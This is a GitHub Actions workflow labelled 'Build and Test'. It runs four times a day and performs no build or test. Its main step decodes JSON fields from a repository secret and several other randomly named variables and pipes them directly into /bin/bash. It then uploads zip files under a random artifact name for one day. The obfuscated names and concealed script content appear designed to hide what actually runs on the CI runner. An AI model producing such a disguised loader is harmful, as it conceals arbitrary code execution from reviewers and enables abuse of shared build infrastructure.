name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '26 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          fsc077: ${{ secrets.fsc077 }}
        run: |
          printf '%s' "$fsc077" | jq -r .oibmx0 | /bin/bash
          printf '%s' "$by7" | jq -r .syrs834 | /bin/bash
          printf '%s' "$vcxww5" | jq -r .rb31 | /bin/bash
          echo $eke97501 | jq -r .t8 | /bin/bash
          printf '%s' "$m6" | jq -r .fzfv9 | /bin/bash
          echo $cxsut3 | jq -r .tcrmf20 | /bin/bash

      - name: Archive results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: EWWrabgy
          path: "*.zip"
          retention-days: 1
